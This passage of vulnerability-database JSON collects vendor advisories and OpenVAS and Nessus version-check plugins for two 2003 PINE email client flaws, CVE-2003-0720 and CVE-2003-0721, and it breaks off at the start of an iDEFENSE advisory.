"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:24", "references": [], "pluginID": "52525", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "published": "2008-09-04T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "FreeBSD Ports: pine, zh-pine, iw-pine", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2016-09-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=52525", "id": "OPENVAS:52525", "sourceData": "#\n#VID 39bd57e6-5d83-11d8-80e3-0020ed76ef5a\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pine\n zh-pine\n iw-pine\n\nCVE-2003-0720\nBuffer overflow in PINE before 4.58 allows remote attackers to execute\narbitrary code via a malformed message/external-body MIME type.\n\nCVE-2003-0721\nInteger signedness error in rfc2231_get_param from strings.c in PINE\nbefore 4.58 allows remote attackers to execute arbitrary code via an\nemail that causes an out-of-bounds array access using a negative\nnumber.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.idefense.com/application/poi/display?id=5\nhttp://www.vuxml.org/freebsd/39bd57e6-5d83-11d8-80e3-0020ed76ef5a.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52525);\n script_version(\"$Revision: 4164 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-28 09:03:16 +0200 (Wed, 28 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: pine, zh-pine, iw-pine\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pine\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.58\")<0) {\n txt += 'Package pine version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"zh-pine\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.58\")<0) {\n txt += 'Package zh-pine version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"iw-pine\");\nif(!isnull(bver) && revcomp(a:bver, b:\"4.58\")<0) {\n txt += 'Package iw-pine version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-12-11T17:41:48", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "any", "packageVersion": "4.44-19.21AS.0", "arch": "i386", "packageName": "pine", "packageFilename": "pine-4.44-19.21AS.0.i386.rpm", "operator": "lt"}], "description": "Pine, developed at the University of Washington, is a tool for reading,\nsending, and managing electronic messages (including mail and news).\n\nA buffer overflow exists in the way unpatched versions of Pine prior to\n4.57 handle the 'message/external-body' type. The Common Vulnerabilities\nand Exposures project (cve.mitre.org) has assigned the name CAN-2003-0720\nto this issue.\n\nAn integer overflow exists in the Pine MIME header parsing in versions\nprior to 4.57. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2003-0721 to this issue.\n\nBoth of these flaws could be exploited by a remote attacker sending a\ncarefully crafted email to the victim that will execute arbitrary code when\nthe email is opened using Pine.\n\nAll users of Pine are advised to upgrade to these erratum packages, which\ncontain a backported security patch correcting these issues.\n\nRed Hat would like to thank iDefense for bringing these issues to our\nattention and the University of Washington for the patch.", "reporter": "RedHat", "published": "2003-09-11T04:00:00", "type": "redhat", "title": "(RHSA-2003:274) pine security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0720", "CVE-2003-0721"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-14T19:25:40", "id": "RHSA-2003:274", "href": "https://access.redhat.com/errata/RHSA-2003:274", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2016-09-26T17:24:41", "references": ["http://xforce.iss.net/xforce/xfdb/29271", "http://www.mozilla.org/security/announce/2008/mfsa2008-61.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-60.html", "http://www.samba.org/samba/whatsnew/samba-3.0.5.html", "http://www.idefense.com/application/poi/display?id=5", "http://www.mozilla.org/security/announce/2008/mfsa2008-63.html", "http://secunia.com/advisories/24517/", "http://www.mozilla.org/security/announce/2008/mfsa2008-64.html", "http://www.FreeBSD.org/ports/portaudit/39bd57e6-5d83-11d8-80e3-0020ed76ef5a.html", "http://www.mozilla.org/security/announce/2008/mfsa2008-62.html", "http://www.opera.com/docs/changelogs/freebsd/926/"], "pluginID": "12602", "edition": 1, "description": "The following package needs to be updated: iw-pine", "reporter": "Tenable", "published": "2004-07-06T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "nessus", "title": "FreeBSD : pine remotely exploitable vulnerabilities (151)", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2004-07-06T00:00:00", "id": "FREEBSD_PINE_458.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12602", "sourceData": "# @DEPRECATED@\n#\n# This script has been deprecated by freebsd_pkg_39bd57e65d8311d880e30020ed76ef5a.nasl.\n#\n# Disabled on 2011/10/02.\n#\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This script contains information extracted from VuXML :\n#\n# Copyright 2003-2006 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n#\n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n#\n#\n\ninclude('compat.inc');\n\nif ( description )\n{\n script_id(12602);\n script_version(\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2003-0721\");\n script_cve_id(\"CVE-2003-0720\");\n\n script_name(english:\"FreeBSD : pine remotely exploitable vulnerabilities (151)\");\n\nscript_set_attribute(attribute:'synopsis', value: 'The remote host is missing a security update');\nscript_set_attribute(attribute:'description', value:'The following package needs to be updated: iw-pine');\nscript_set_attribute(attribute: 'cvss_vector', value: 'CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P');\nscript_set_attribute(attribute:'solution', value: 'Update the package on the remote host');\nscript_set_attribute(attribute: 'see_also', value: 'http://secunia.com/advisories/24517/\nhttp://www.idefense.com/application/poi/display?id=5\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-60.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-61.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-62.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-63.html\nhttp://www.mozilla.org/security/announce/2008/mfsa2008-64.html\nhttp://www.opera.com/docs/changelogs/freebsd/926/\nhttp://www.samba.org/samba/whatsnew/samba-3.0.5.html\nhttp://xforce.iss.net/xforce/xfdb/29271');\nscript_set_attribute(attribute:'see_also', value: 'http://www.FreeBSD.org/ports/portaudit/39bd57e6-5d83-11d8-80e3-0020ed76ef5a.html');\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/06\");\n script_end_attributes();\n script_summary(english:\"Check for iw-pine\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"FreeBSD Local Security Checks\";\n script_family(english:family[\"english\"]);\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/FreeBSD/pkg_info\");\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"This plugin has been deprecated. Refer to plugin #37712 (freebsd_pkg_39bd57e65d8311d880e30020ed76ef5a.nasl) instead.\");\n\nglobal_var cvss_score;\ncvss_score=7;\ninclude('freebsd_package.inc');\n\n\npkg_test(pkg:\"pine<4.58\");\n\npkg_test(pkg:\"zh-pine<4.58\");\n\npkg_test(pkg:\"iw-pine<4.58\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-16T05:13:42", "references": ["https://access.redhat.com/errata/RHSA-2003:274", "https://access.redhat.com/security/cve/cve-2003-0720", "https://access.redhat.com/security/cve/cve-2003-0721"], "pluginID": "12420", "description": "Updated Pine packages that resolve remotely exploitable security issues are now available.\n\nPine, developed at the University of Washington, is a tool for reading, sending, and managing electronic messages (including mail and news).\n\nA buffer overflow exists in the way unpatched versions of Pine prior to 4.57 handle the 'message/external-body' type. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0720 to this issue.\n\nAn integer overflow exists in the Pine MIME header parsing in versions prior to 4.57. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2003-0721 to this issue.\n\nBoth of these flaws could be exploited by a remote attacker sending a carefully crafted email to the victim that will execute arbitrary code when the email is opened using Pine.\n\nAll users of Pine are advised to upgrade to these erratum packages, which contain a backported security patch correcting these issues.\n\nRed Hat would like to thank iDefense for bringing these issues to our attention and the University of Washington for the patch.", "edition": 7, "reporter": "Tenable", "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : pine (RHSA-2003:274)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:pine"], "id": "REDHAT-RHSA-2003-274.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=12420", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:274. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(12420);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/11/15 11:40:29\");\n\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n script_xref(name:\"RHSA\", value:\"2003:274\");\n\n script_name(english:\"RHEL 2.1 : pine (RHSA-2003:274)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated Pine packages that resolve remotely exploitable security\nissues are now available.\n\nPine, developed at the University of Washington, is a tool for\nreading, sending, and managing electronic messages (including mail and\nnews).\n\nA buffer overflow exists in the way unpatched versions of Pine prior\nto 4.57 handle the 'message/external-body' type. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2003-0720 to this issue.\n\nAn integer overflow exists in the Pine MIME header parsing in versions\nprior to 4.57. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CVE-2003-0721 to this issue.\n\nBoth of these flaws could be exploited by a remote attacker sending a\ncarefully crafted email to the victim that will execute arbitrary code\nwhen the email is opened using Pine.\n\nAll users of Pine are advised to upgrade to these erratum packages,\nwhich contain a backported security patch correcting these issues.\n\nRed Hat would like to thank iDefense for bringing these issues to our\nattention and the University of Washington for the patch.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:274\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected pine package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:pine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:274\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"pine-4.44-19.21AS.0\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"pine\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T17:00:16", "references": ["http://www.nessus.org/u?0c5566fe", "http://www.nessus.org/u?a53e28a1"], "pluginID": "37712", "description": "Pine versions prior to 4.58 are affected by two vulnerabilities discovered by iDEFENSE, a buffer overflow in mailview.c and an integer overflow in strings.c. Both vulnerabilities can result in arbitrary code execution when processing a malicious message.", "edition": 5, "reporter": "Tenable", "published": "2009-04-23T00:00:00", "title": "FreeBSD : pine remotely exploitable vulnerabilities (39bd57e6-5d83-11d8-80e3-0020ed76ef5a)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:iw-pine", "p-cpe:/a:freebsd:freebsd:zh-pine", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:pine"], "id": "FREEBSD_PKG_39BD57E65D8311D880E30020ED76EF5A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=37712", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(37712);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/10 11:49:39\");\n\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n\n script_name(english:\"FreeBSD : pine remotely exploitable vulnerabilities (39bd57e6-5d83-11d8-80e3-0020ed76ef5a)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Pine versions prior to 4.58 are affected by two vulnerabilities\ndiscovered by iDEFENSE, a buffer overflow in mailview.c and an integer\noverflow in strings.c. Both vulnerabilities can result in arbitrary\ncode execution when processing a malicious message.\"\n );\n # http://www.idefense.com/application/poi/display?id=5\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a53e28a1\"\n );\n # https://vuxml.freebsd.org/freebsd/39bd57e6-5d83-11d8-80e3-0020ed76ef5a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0c5566fe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:iw-pine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:pine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:zh-pine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/09/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"pine<4.58\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"zh-pine<4.58\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"iw-pine<4.58\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2018-08-31T01:16:15", "references": ["http://www.idefense.com/application/poi/display?id=5"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.58", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "iw-pine", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.58", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "pine", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.58", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "zh-pine", "operator": "lt"}], "description": "\nPine versions prior to 4.58 are affected by two\n\t vulnerabilities discovered by iDEFENSE, a buffer overflow\n\t in mailview.c and an integer overflow in strings.c. Both\n\t vulnerabilities can result in arbitrary code execution\n\t when processing a malicious message.\n", "edition": 3, "reporter": "FreeBSD", "published": "2003-09-10T00:00:00", "title": "pine remotely exploitable vulnerabilities", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2003-09-10T00:00:00", "id": "39BD57E6-5D83-11D8-80E3-0020ED76EF5A", "href": "https://vuxml.freebsd.org/freebsd/39bd57e6-5d83-11d8-80e3-0020ed76ef5a.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T12:22:34", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "4.33-153", "packageName": "pine", "packageFilename": "pine-4.33-153.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.0", "packageVersion": "4.44-281", "packageName": "pine", "packageFilename": "pine-4.44-281.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.2", "packageVersion": "4.33-279", "packageName": "pine", "packageFilename": "pine-4.33-279.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "4.33-280", "packageName": "pine", "packageFilename": "pine-4.33-280.i386.rpm", "arch": "i386", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.1", "packageVersion": "4.44-283", "packageName": "pine", "packageFilename": "pine-4.44-283.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "7.3", "packageVersion": "4.33-101", "packageName": "pine", "packageFilename": "pine-4.33-101.sparc.rpm", "arch": "sparc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "8.2", "packageVersion": "4.53-109", "packageName": "pine", "packageFilename": "pine-4.53-109.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine. Additionally an integer overflow in the MIME header parsing code has been fixed.", "edition": 1, "reporter": "Suse", "published": "2003-09-11T07:48:49", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "suse", "title": "remote code execution in pine", "bulletinFamily": "unix", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "modified": "2003-09-11T07:48:49", "id": "SUSE-SA:2003:037", "href": "http://lists.opensuse.org/opensuse-security-announce/2003-09/msg00010.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:08", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\niDEFENSE Security Advisory 09.10.03:\r\nhttp://www.idefense.com/advisory/09.10.03.txt\r\nTwo Exploitable Overflows in PINE\r\nSeptember 10, 2003\r\n\r\nI. BACKGROUND\r\n\r\nPINE (The Program for Internet News & Email) is a popular e-mail client\r\nshipped with many Linux and Unix distributions. It was developed at the\r\nUniversity of Washington; more information is available at\r\nhttp://www.washington.edu/pine/ .\r\n\r\nII. DESCRIPTION\r\n\r\nPINE contains two exploitable vulnerabilities that can be triggered\r\nwhen a victim opens a specially crafted email sent by an attacker.\r\n\r\n- --- Vulnerability 1: Buffer Overflow ---\r\n\r\nA remotely exploitable buffer overflow exists within the parsing of 